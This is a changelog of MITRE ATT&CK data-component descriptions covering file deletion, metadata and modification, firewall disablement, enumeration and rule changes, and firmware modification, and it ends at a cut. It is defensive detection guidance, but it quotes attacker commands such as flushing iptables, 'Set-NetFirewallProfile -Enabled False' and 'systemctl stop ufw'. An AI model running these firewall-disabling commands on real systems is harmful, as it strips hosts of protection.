|---|
| t | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT | t | Refers to events where files are removed from a system or st |
| _TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, | | orage device. These events can indicate legitimate housekeep |
| rmdir, unlinked, or renameat rules) | | ing activities or malicious actions such as attackers attemp |
| | | ting to cover their tracks. Monitoring file deletions helps |
| | | organizations identify unauthorized or suspicious activities |
| | | . This data component can be collected through the followin |
| | | g measures: Windows - Sysmon: Event ID 23: Logs file delet |
| | | ion events, including details such as file paths and respons |
| | | ible processes. - Windows Event Log: Enable "Object Access" |
| | | auditing to monitor file deletions. - PowerShell: `Get-WinEv |
| | | ent -FilterHashtable @{LogName='Security'; ID=4663} | Where- |
| | | Object {$_.Message -like '*DELETE*'}` Linux - Auditd: Use |
| | | audit rules to capture file deletion events: `auditctl -a al |
| | | ways,exit -F arch=b64 -S unlink -S rename -S rmdir -k file_d |
| | | eletion` - Query logs: `ausearch -k file_deletion` - Inotify |
| | | : Use inotifywait to monitor file deletions: `inotifywait -m |
| | | /path/to/watch -e delete` macOS - Endpoint Security Frame |
| | | work (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to |
| | | capture file deletion activities. - FSEvents: Track file de |
| | | letion activities in real-time: `fs_usage | grep unlink` SI |
| | | EM Integration - Forward file deletion logs to a SIEM for c |
| | | entralized monitoring and correlation with other events. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:10:21.434Z |
| description | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) | Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 23: Logs file deletion events, including details such as file paths and responsible processes.
- Windows Event Log: Enable "Object Access" auditing to monitor file deletions.
- PowerShell: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663} | Where-Object {$_.Message -like '*DELETE*'}`
Linux
- Auditd: Use audit rules to capture file deletion events: `auditctl -a always,exit -F arch=b64 -S unlink -S rename -S rmdir -k file_deletion`
- Query logs: `ausearch -k file_deletion`
- Inotify: Use inotifywait to monitor file deletions: `inotifywait -m /path/to/watch -e delete`
macOS
- Endpoint Security Framework (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to capture file deletion activities.
- FSEvents: Track file deletion activities in real-time: `fs_usage | grep unlink`
SIEM Integration
- Forward file deletion logs to a SIEM for centralized monitoring and correlation with other events.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a file, which may include information | t | contextual information about a file, including attributes su |
| such as name, the content (ex: signature, headers, or data/m | | ch as the file's name, size, type, content (e.g., signatures |
| edia), user/owner, permissions, etc. | | , headers, media), user/owner, permissions, timestamps, and |
| | | other related properties. File metadata provides insights in |
| | | to a file's characteristics and can be used to detect malici |
| | | ous activity, unauthorized modifications, or other anomalies |
| | | . Examples: - File Ownership and Permissions: Checking the |
| | | owner and permissions of a critical configuration file like |
| | | /etc/passwd on Linux or C:\Windows\System32\config\SAM on W |
| | | indows. - Timestamps: Analyzing the creation, modification, |
| | | and access timestamps of a file. - File Content and Signatur |
| | | es: Extracting the headers of an executable file to verify i |
| | | ts signature or detect packing/obfuscation. - File Attribute |
| | | s: Analyzing attributes like hidden, system, or read-only fl |
| | | ags in Windows. - File Hashes: Generating MD5, SHA-1, or SHA |
| | | -256 hashes of files to compare against threat intelligence |
| | | feeds. - File Location: Monitoring files located in unusual |
| | | directories or paths, such as temporary or user folders. Th |
| | | is data component can be collected through the following mea |
| | | sures: Windows - Sysinternals Tools: Use `AccessEnum` or ` |
| | | PSFile` to retrieve metadata about file access and permissio |
| | | ns. - Windows Event Logs: Enable object access auditing and |
| | | monitor events like 4663 (Object Access) and 5140 (A network |
| | | share object was accessed). - PowerShell: Use Get-Item or G |
| | | et-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Direc |
| | | tory" -Recurse | Select-Object Name, Length, LastWriteTime, |
| | | Attributes` Linux - File System Commands: Use `ls -l` or s |
| | | tat to retrieve file metadata: `stat /path/to/file` - Auditd |
| | | : Configure audit rules to log metadata access: `auditctl -w |
| | | /path/to/file -p wa -k file_metadata` - Filesystem Integrit |
| | | y Tools: Tools like tripwire or AIDE (Advanced Intrusion Det |
| | | ection Environment) can monitor file metadata changes. macO |
| | | S - FSEvents: Use FSEvents to track file metadata changes. |
| | | - Endpoint Security Framework (ESF): Capture metadata-relate |
| | | d events via ESF APIs. - Command-Line Tools: Use ls -l or xa |
| | | ttr for file attributes: `ls -l@ /path/to/file` SIEM Integr |
| | | ation - Forward file metadata logs from endpoint or network |
| | | devices to a SIEM for centralized analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-11-01T21:18:51.941Z | 2025-04-18T15:10:14.725Z |
| description | Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. | contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples:
- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\Windows\System32\config\SAM on Windows.
- Timestamps: Analyzing the creation, modification, and access timestamps of a file.
- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.
- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.
- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.
- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.
This data component can be collected through the following measures:
Windows
- Sysinternals Tools: Use `AccessEnum` or `PSFile` to retrieve metadata about file access and permissions.
- Windows Event Logs: Enable object access auditing and monitor events like 4663 (Object Access) and 5140 (A network share object was accessed).
- PowerShell: Use Get-Item or Get-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Directory" -Recurse | Select-Object Name, Length, LastWriteTime, Attributes`
Linux
- File System Commands: Use `ls -l` or stat to retrieve file metadata: `stat /path/to/file`
- Auditd: Configure audit rules to log metadata access: `auditctl -w /path/to/file -p wa -k file_metadata`
- Filesystem Integrity Tools: Tools like tripwire or AIDE (Advanced Intrusion Detection Environment) can monitor file metadata changes.
macOS
- FSEvents: Use FSEvents to track file metadata changes.
- Endpoint Security Framework (ESF): Capture metadata-related events via ESF APIs.
- Command-Line Tools: Use ls -l or xattr for file attributes: `ls -l@ /path/to/file`
SIEM Integration
- Forward file metadata logs from endpoint or network devices to a SIEM for centralized analysis. |
| x_mitre_version | 1.0 | 1.1 |
File: File Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a file, or its access permissions and attrib | t | Changes made to a file, including updates to its contents, m |
| utes, typically to alter the contents of the targeted file ( | | etadata, access permissions, or attributes. These modificati |
| ex: Windows EID 4670 or Sysmon EID 2) | | ons may indicate legitimate activity (e.g., software updates |
| | | ) or unauthorized changes (e.g., tampering, ransomware, or a |
| | | dversarial modifications). Examples: - Content Modificatio |
| | | ns: Changes to the content of a configuration file, such as |
| | | modifying `/etc/ssh/sshd_config` on Linux or `C:\Windows\Sys |
| | | tem32\drivers\etc\hosts` on Windows. - Permission Changes: A |
| | | ltering file permissions to allow broader access, such as ch |
| | | anging a file from `644` to `777` on Linux or modifying NTFS |
| | | permissions on Windows. - Attribute Modifications: Changing |
| | | a file's attributes to hidden, read-only, or system on Wind |
| | | ows. - Timestamp Manipulation: Adjusting a file's creation o |
| | | r modification timestamp using tools like `touch` in Linux o |
| | | r timestomping tools on Windows. - Software or System File C |
| | | hanges: Modifying system files such as `boot.ini`, kernel mo |
| | | dules, or application binaries. This data component can be |
| | | collected through the following measures: Windows - Event |
| | | Logs: Enable file system auditing to monitor file modificati |
| | | ons using Security Event ID 4670 (File System Audit) or Sysm |
| | | on Event ID 2 (File creation time changed). - PowerShell: Us |
| | | e Get-ItemProperty or Get-Acl cmdlets to monitor file proper |
| | | ties: `Get-Item -Path "C:\path\to\file" | Select-Object Name |
| | | , Attributes, LastWriteTime` Linux - File System Monitorin |
| | | g: Use tools like auditd with rules to monitor file modifica |
| | | tions: `auditctl -w /path/to/file -p wa -k file_modification |
| | | ` - Inotify: Use inotifywait to watch for real-time changes |
| | | to files or directories: `inotifywait -m /path/to/file` mac |
| | | OS - Endpoint Security Framework (ESF): Monitor file modifi |
| | | cation events using ESF APIs. - Audit Framework: Configure a |
| | | udit rules to track file changes. - Command-Line Tools: Use |
| | | fs_usage to monitor file activities: `fs_usage -w /path/to/f |
| | | ile` SIEM Tools - Collect logs from endpoint agents (e.g., |
| | | Sysmon, Auditd) and file servers to centralize file modific |
| | | ation event data. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:11.410Z |
| description | Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2) | Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples:
- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\Windows\System32\drivers\etc\hosts` on Windows.
- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.
- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.
- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.
- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.
This data component can be collected through the following measures:
Windows
- Event Logs: Enable file system auditing to monitor file modifications using Security Event ID 4670 (File System Audit) or Sysmon Event ID 2 (File creation time changed).
- PowerShell: Use Get-ItemProperty or Get-Acl cmdlets to monitor file properties: `Get-Item -Path "C:\path\to\file" | Select-Object Name, Attributes, LastWriteTime`
Linux
- File System Monitoring: Use tools like auditd with rules to monitor file modifications: `auditctl -w /path/to/file -p wa -k file_modification`
- Inotify: Use inotifywait to watch for real-time changes to files or directories: `inotifywait -m /path/to/file`
macOS
- Endpoint Security Framework (ESF): Monitor file modification events using ESF APIs.
- Audit Framework: Configure audit rules to track file changes.
- Command-Line Tools: Use fs_usage to monitor file activities: `fs_usage -w /path/to/file`
SIEM Tools
- Collect logs from endpoint agents (e.g., Sysmon, Auditd) and file servers to centralize file modification event data. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firewall: Firewall Disable
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Deactivation or stoppage of a cloud service (ex: Write/Delet | t | The deactivation, misconfiguration, or complete stoppage of |
| e entries within Azure Firewall Activity Logs) | | firewall services, either on a host or in a cloud control pl |
| | | ane. Such activity may involve turning off firewalls, modify |
| | | ing rules to disable protection, or deleting firewall-relate |
| | | d configurations and activity logs. Examples: - Disabling |
| | | Host-Based Firewalls: Stopping the Windows Defender Firewall |
| | | service or using `iptables -F` to flush all rules on a Linu |
| | | x system. - Cloud Firewall Modification or Deactivation: Mod |
| | | ifying or deleting security group rules in AWS or disabling |
| | | a network firewall in Azure. - Activity Log Deletion: Writin |
| | | g or deleting entries in Azure Firewall Activity Logs to hid |
| | | e unauthorized firewall changes. - Temporary Disable for Mal |
| | | icious Operations: Temporarily disabling a firewall to allow |
| | | malicious files or traffic, then re-enabling it to avoid de |
| | | tection. - Using Command-Line Tools to Stop Firewalls: Runni |
| | | ng commands like `Set-NetFirewallProfile -Enabled False on W |
| | | indows or systemctl stop ufw` on Linux. This data component |
| | | can be collected through the following measures: Cloud Con |
| | | trol Plane - Azure Activity Logs: - Enable logging of a |
| | | dministrative actions, such as stopping or modifying Azure F |
| | | irewall configurations. - Use Azure Monitor to track spe |
| | | cific firewall-related actions, including disabling or rule |
| | | deletion. - AWS CloudTrail Logs: - Monitor `RevokeSecuri |
| | | tyGroupIngress` or `RevokeSecurityGroupEgress` events to det |
| | | ect rule changes in AWS Security Groups. - Google Cloud Plat |
| | | form Logs: - Collect logs from the Firewall Rules resour |
| | | ce in Google Cloud Operations Suite to detect rule deletions |
| | | or modifications. Host-Level Firewalls - Windows Firewall |
| | | Event Logs: - Enable logging of firewall state changes: |
| | | - Security Event ID 2004: Firewall service stopped. |
| | | - Security Event ID 2005: Firewall service started. |
| | | - Use Sysmon for process creation events tied to firewa |
| | | ll commands or scripts (Sysmon Event ID 1). - Linux Firewall |
| | | Logs: Use auditd to track commands like iptables, firewalld |
| | | , or ufw: `auditctl -a always,exit -F arch=b64 -S execve -k |
| | | firewall_disable` - macOS Firewall: Monitor changes to the m |
| | | acOS Application Firewall using the log show command. Netwo |
| | | rk-Level Monitoring - IDS/IPS Alerts: Deploy IDS/IPS system |
| | | s to monitor abnormal traffic flows that could indicate fire |
| | | wall disablement. - NetFlow Data: Analyze NetFlow or packet |
| | | capture data for traffic patterns inconsistent with firewall |
| | | enforcement. SIEM and CSPM Tools - SIEM Integration: Use |
| | | tools like Splunk or QRadar to centralize and analyze firewa |
| | | ll disablement events from both hosts and cloud platforms. - |
| | | Cloud Security Posture Management (CSPM): Use CSPM solution |
| | | s to monitor misconfigurations and track deactivation of cri |
| | | tical cloud services like firewalls. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:16:59.931Z |
| description | Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs) | The deactivation, misconfiguration, or complete stoppage of firewall services, either on a host or in a cloud control plane. Such activity may involve turning off firewalls, modifying rules to disable protection, or deleting firewall-related configurations and activity logs. Examples:
- Disabling Host-Based Firewalls: Stopping the Windows Defender Firewall service or using `iptables -F` to flush all rules on a Linux system.
- Cloud Firewall Modification or Deactivation: Modifying or deleting security group rules in AWS or disabling a network firewall in Azure.
- Activity Log Deletion: Writing or deleting entries in Azure Firewall Activity Logs to hide unauthorized firewall changes.
- Temporary Disable for Malicious Operations: Temporarily disabling a firewall to allow malicious files or traffic, then re-enabling it to avoid detection.
- Using Command-Line Tools to Stop Firewalls: Running commands like `Set-NetFirewallProfile -Enabled False on Windows or systemctl stop ufw` on Linux.
This data component can be collected through the following measures:
Cloud Control Plane
- Azure Activity Logs:
- Enable logging of administrative actions, such as stopping or modifying Azure Firewall configurations.
- Use Azure Monitor to track specific firewall-related actions, including disabling or rule deletion.
- AWS CloudTrail Logs:
- Monitor `RevokeSecurityGroupIngress` or `RevokeSecurityGroupEgress` events to detect rule changes in AWS Security Groups.
- Google Cloud Platform Logs:
- Collect logs from the Firewall Rules resource in Google Cloud Operations Suite to detect rule deletions or modifications.
Host-Level Firewalls
- Windows Firewall Event Logs:
- Enable logging of firewall state changes:
- Security Event ID 2004: Firewall service stopped.
- Security Event ID 2005: Firewall service started.
- Use Sysmon for process creation events tied to firewall commands or scripts (Sysmon Event ID 1).
- Linux Firewall Logs: Use auditd to track commands like iptables, firewalld, or ufw: `auditctl -a always,exit -F arch=b64 -S execve -k firewall_disable`
- macOS Firewall: Monitor changes to the macOS Application Firewall using the log show command.
Network-Level Monitoring
- IDS/IPS Alerts: Deploy IDS/IPS systems to monitor abnormal traffic flows that could indicate firewall disablement.
- NetFlow Data: Analyze NetFlow or packet capture data for traffic patterns inconsistent with firewall enforcement.
SIEM and CSPM Tools
- SIEM Integration: Use tools like Splunk or QRadar to centralize and analyze firewall disablement events from both hosts and cloud platforms.
- Cloud Security Posture Management (CSPM): Use CSPM solutions to monitor misconfigurations and track deactivation of critical cloud services like firewalls. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firewall: Firewall Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of available firewalls and/or their associ | t | Querying and extracting a list of available firewalls or the |
| ated settings/rules (ex: Azure Network Firewall CLI Show com | | ir associated configurations and rules. This activity can oc |
| mands) | | cur across host systems and cloud control planes, providing |
| | | insight into the state and configuration of firewalls that p |
| | | rotect the environment. Examples: - Querying Host-Based Fi |
| | | rewalls: Using Windows PowerShell commands like `Get-NetFire |
| | | wallRule` or Linux commands such as `iptables -L` or `firewa |
| | | lld --list-all`. - Cloud Firewall Rule Listing: Running comm |
| | | ands like `az network firewall list` for Azure or `aws ec2 d |
| | | escribe-security-groups` for AWS. - Using Management APIs: L |
| | | everaging APIs like Google Cloud Firewall's `list` API metho |
| | | d or AWS's DescribeSecurityGroups API. Identifying Misconfig |
| | | urations: Extracting firewall rules to identify “allow all” |
| | | policies or rules that lack logging. - Enumerating with CLI |
| | | Tools: Using CLI commands like `gcloud compute firewall-rule |
| | | s list` to extract firewall settings in Google Cloud. This |
| | | data component can be collected through the following measur |
| | | es: Cloud Control Plane - Azure Activity Logs:Collect logs |
| | | from Azure Firewall to monitor rule listing commands. Enabl |
| | | e logging for `az network firewall` commands. - AWS CloudTra |
| | | il: Monitor calls to `DescribeSecurityGroups` or `DescribeNe |
| | | tworkAcls` APIs. Google Cloud Operations Suite: Collect logs |
| | | for `gcloud compute firewall-rules list` or API calls to `f |
| | | irewalls.list`. Host-Based Firewalls - Windows Event Logs: |
| | | Use PowerShell transcription logs to capture commands like |
| | | `Get-NetFirewallRule`. - Linux Auditd: Track executions of c |
| | | ommands like `iptables -L` or `ufw status` using auditd: `au |
| | | ditctl -a always,exit -F arch=b64 -S execve -k firewall_enum |
| | | ` - macOS: Monitor logs for firewall-related queries via the |
| | | Console app or log monitoring tools. SIEM Integration - C |
| | | ollect logs from endpoints and cloud platforms to centralize |
| | | data and detect enumeration activity. Endpoint Detection a |
| | | nd Response (EDR) - Use EDR tools to track enumeration comm |
| | | ands or API calls performed on managed devices. CSPM Tools |
| | | - Deploy Cloud Security Posture Management tools to monitor |
| | | for unauthorized enumeration of firewall rules or configura |
| | | tions. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:17:06.404Z |
| description | An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands) | Querying and extracting a list of available firewalls or their associated configurations and rules. This activity can occur across host systems and cloud control planes, providing insight into the state and configuration of firewalls that protect the environment. Examples:
- Querying Host-Based Firewalls: Using Windows PowerShell commands like `Get-NetFirewallRule` or Linux commands such as `iptables -L` or `firewalld --list-all`.
- Cloud Firewall Rule Listing: Running commands like `az network firewall list` for Azure or `aws ec2 describe-security-groups` for AWS.
- Using Management APIs: Leveraging APIs like Google Cloud Firewall's `list` API method or AWS's DescribeSecurityGroups API.
Identifying Misconfigurations: Extracting firewall rules to identify “allow all” policies or rules that lack logging.
- Enumerating with CLI Tools: Using CLI commands like `gcloud compute firewall-rules list` to extract firewall settings in Google Cloud.
This data component can be collected through the following measures:
Cloud Control Plane
- Azure Activity Logs:Collect logs from Azure Firewall to monitor rule listing commands. Enable logging for `az network firewall` commands.
- AWS CloudTrail: Monitor calls to `DescribeSecurityGroups` or `DescribeNetworkAcls` APIs.
Google Cloud Operations Suite: Collect logs for `gcloud compute firewall-rules list` or API calls to `firewalls.list`.
Host-Based Firewalls
- Windows Event Logs: Use PowerShell transcription logs to capture commands like `Get-NetFirewallRule`.
- Linux Auditd: Track executions of commands like `iptables -L` or `ufw status` using auditd: `auditctl -a always,exit -F arch=b64 -S execve -k firewall_enum`
- macOS: Monitor logs for firewall-related queries via the Console app or log monitoring tools.
SIEM Integration
- Collect logs from endpoints and cloud platforms to centralize data and detect enumeration activity.
Endpoint Detection and Response (EDR)
- Use EDR tools to track enumeration commands or API calls performed on managed devices.
CSPM Tools
- Deploy Cloud Security Posture Management tools to monitor for unauthorized enumeration of firewall rules or configurations. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firewall: Firewall Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a firewall and activity around it such | t | Contextual information about firewalls, including their conf |
| as name, policy, or status | | igurations, policies, status, and other details such as name |
| | | s and associated rules. This metadata provides valuable insi |
| | | ghts into the operational state and configurations of firewa |
| | | lls, both in cloud control planes and host systems. Examples |
| | | : - Firewall Name and Configuration: The name, type, and p |
| | | urpose of a firewall such as "Azure Firewall - Production En |
| | | vironment." - Policy Details: Capturing firewall policy deta |
| | | ils, such as "Allow inbound TCP 443 to web servers." - Firew |
| | | all Status: Status indicators like "Active," "Disabled," or |
| | | "Pending Updates." - Audit Log Metadata: Log entries showing |
| | | administrative changes, such as "Policy modified by admin@d |
| | | omain.com." - Rules Associated with Firewalls: Rules specify |
| | | ing source/destination IP ranges, protocols, and ports. - Ta |
| | | gging Information: Tags like "Environment: Production" or "O |
| | | wner: NetworkOps." This data component can be collected thr |
| | | ough the following measures: Cloud Control Plane - Azure: |
| | | Use Azure Activity Logs and Network Watcher to collect metad |
| | | ata for Azure Firewall. - Example: `az network firewall |
| | | show --name <firewall-name>` - AWS: Use AWS CloudTrail and d |
| | | escribe commands: `aws ec2 describe-security-groups` - Googl |
| | | e Cloud: Use gcloud commands to extract metadata: `gcloud co |
| | | mpute firewall-rules list --format=json` Host-Based Firewal |
| | | ls - Windows: Use PowerShell to gather metadata: `Get-NetFi |
| | | rewallRule -PolicyStore PersistentStore` - Linux: Query ipta |
| | | bles or nftables rulesets: `iptables -S` - macOS: Use pfctl |
| | | to extract metadata: `sudo pfctl -sr` SIEM Integration - C |
| | | ollect logs from cloud platforms, host systems, and network |
| | | appliances. API Monitoring - Monitor API calls for metadat |
| | | a requests. Example (AWS): `Capture DescribeSecurityGroups o |
| | | r DescribeNetworkAcls` calls via CloudTrail. Endpoint Detec |
| | | tion and Response (EDR) - Use EDR solutions to monitor fire |
| | | wall management tools for configuration changes or queries. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:17:03.149Z |
| description | Contextual data about a firewall and activity around it such as name, policy, or status | Contextual information about firewalls, including their configurations, policies, status, and other details such as names and associated rules. This metadata provides valuable insights into the operational state and configurations of firewalls, both in cloud control planes and host systems. Examples:
- Firewall Name and Configuration: The name, type, and purpose of a firewall such as "Azure Firewall - Production Environment."
- Policy Details: Capturing firewall policy details, such as "Allow inbound TCP 443 to web servers."
- Firewall Status: Status indicators like "Active," "Disabled," or "Pending Updates."
- Audit Log Metadata: Log entries showing administrative changes, such as "Policy modified by admin@domain.com."
- Rules Associated with Firewalls: Rules specifying source/destination IP ranges, protocols, and ports.
- Tagging Information: Tags like "Environment: Production" or "Owner: NetworkOps."
This data component can be collected through the following measures:
Cloud Control Plane
- Azure: Use Azure Activity Logs and Network Watcher to collect metadata for Azure Firewall.
- Example: `az network firewall show --name `
- AWS: Use AWS CloudTrail and describe commands: `aws ec2 describe-security-groups`
- Google Cloud: Use gcloud commands to extract metadata: `gcloud compute firewall-rules list --format=json`
Host-Based Firewalls
- Windows: Use PowerShell to gather metadata: `Get-NetFirewallRule -PolicyStore PersistentStore`
- Linux: Query iptables or nftables rulesets: `iptables -S`
- macOS: Use pfctl to extract metadata: `sudo pfctl -sr`
SIEM Integration
- Collect logs from cloud platforms, host systems, and network appliances.
API Monitoring
- Monitor API calls for metadata requests. Example (AWS): `Capture DescribeSecurityGroups or DescribeNetworkAcls` calls via CloudTrail.
Endpoint Detection and Response (EDR)
- Use EDR solutions to monitor firewall management tools for configuration changes or queries. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firewall: Firewall Rule Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a firewall rule, typically to allow/block sp | t | The creation, deletion, or alteration of firewall rules to a |
| ecific network traffic (ex: Windows EID 4950 or Write/Delete | | llow or block specific network traffic. Monitoring changes t |
| entries within Azure Firewall Rule Collection Activity Logs | | o these rules is critical for detecting misconfigurations, u |
| ) | | nauthorized access, or malicious attempts to bypass network |
| | | protections. Examples: - Rule Creation: Adding a new rule |
| | | to allow inbound traffic on port 3389 (RDP). - Rule Deletion |
| | | : Deleting a rule that blocks inbound traffic from untrusted |
| | | IP ranges. - Rule Modification: Changing a rule to allow tr |
| | | affic from "any" source IP instead of a specific trusted ran |
| | | ge. - Audit Log Metadata: Logs indicating "Firewall rule mod |
| | | ified by admin@domain.com." - Platform-Specific Scenarios |
| | | - Azure: Altering rules in an Azure Network Security Group |
| | | (NSG). - AWS: Modifying Security Group rules to allow t |
| | | raffic. - Windows: Changes tracked in Security Event Log |
| | | s (EID 4950 or 4951). This data component can be collected |
| | | through the following measures: Cloud Control Plane - Azur |
| | | e: Collect rule modification logs from Azure Firewall Activi |
| | | ty Logs. - Example Command: `az network firewall policy |
| | | rule-collection-group rule-collection list --policy-name <po |
| | | licy-name>` - AWS: Use CloudTrail to track `AuthorizeSecurit |
| | | yGroupIngress` or `RevokeSecurityGroupIngress` actions. |
| | | Example: `aws ec2 describe-security-groups` - Google Cloud: |
| | | Use gcloud commands to extract firewall rules: `gcloud compu |
| | | te firewall-rules list --format=json` Host-Based Firewalls |
| | | - Windows: - Collect events from the Windows Security |
| | | Event Log (EID 4950: A rule has been modified). - Use Po |
| | | werShell to track rule changes: `Get-NetFirewallRule -Policy |
| | | Store PersistentStore` - Linux: - Monitor iptables or nf |
| | | tables rule modifications: `iptables -L -v` - Use auditd |
| | | for real-time monitoring: `auditctl -w /etc/iptables.rules |
| | | -p wa` - macOS: Use pfctl to monitor rule changes: `sudo pfc |
| | | tl -sr` SIEM Integration - Collect logs from cloud platfor |
| | | ms, host systems, and network appliances for centralized mon |
| | | itoring. API Monitoring - Monitor API calls for firewall r |
| | | ule modifications. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:16:56.720Z |
| description | Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs) | The creation, deletion, or alteration of firewall rules to allow or block specific network traffic. Monitoring changes to these rules is critical for detecting misconfigurations, unauthorized access, or malicious attempts to bypass network protections. Examples:
- Rule Creation: Adding a new rule to allow inbound traffic on port 3389 (RDP).
- Rule Deletion: Deleting a rule that blocks inbound traffic from untrusted IP ranges.
- Rule Modification: Changing a rule to allow traffic from "any" source IP instead of a specific trusted range.
- Audit Log Metadata: Logs indicating "Firewall rule modified by admin@domain.com."
- Platform-Specific Scenarios
- Azure: Altering rules in an Azure Network Security Group (NSG).
- AWS: Modifying Security Group rules to allow traffic.
- Windows: Changes tracked in Security Event Logs (EID 4950 or 4951).
This data component can be collected through the following measures:
Cloud Control Plane
- Azure: Collect rule modification logs from Azure Firewall Activity Logs.
- Example Command: `az network firewall policy rule-collection-group rule-collection list --policy-name `
- AWS: Use CloudTrail to track `AuthorizeSecurityGroupIngress` or `RevokeSecurityGroupIngress` actions.
Example: `aws ec2 describe-security-groups`
- Google Cloud: Use gcloud commands to extract firewall rules: `gcloud compute firewall-rules list --format=json`
Host-Based Firewalls
- Windows:
- Collect events from the Windows Security Event Log (EID 4950: A rule has been modified).
- Use PowerShell to track rule changes: `Get-NetFirewallRule -PolicyStore PersistentStore`
- Linux:
- Monitor iptables or nftables rule modifications: `iptables -L -v`
- Use auditd for real-time monitoring: `auditctl -w /etc/iptables.rules -p wa`
- macOS: Use pfctl to monitor rule changes: `sudo pfctl -sr`
SIEM Integration
- Collect logs from cloud platforms, host systems, and network appliances for centralized monitoring.
API Monitoring
- Monitor API calls for firewall rule modifications. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firmware: Firmware Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to firmware, including its settings and/or data | t | Changes made to firmware, which may include its settings, co |
| , such as MBR (Master Boot Record) and VBR (Volume Boot Reco | | nfigurations, or underlying data. This can encompass alterat |
| rd) | | ions to the Master Boot Record (MBR), Volume Boot Record (VB |
| | | R), or other firmware components critical to system boot and |
| | | functionality. Such modifications are often indicators of a |
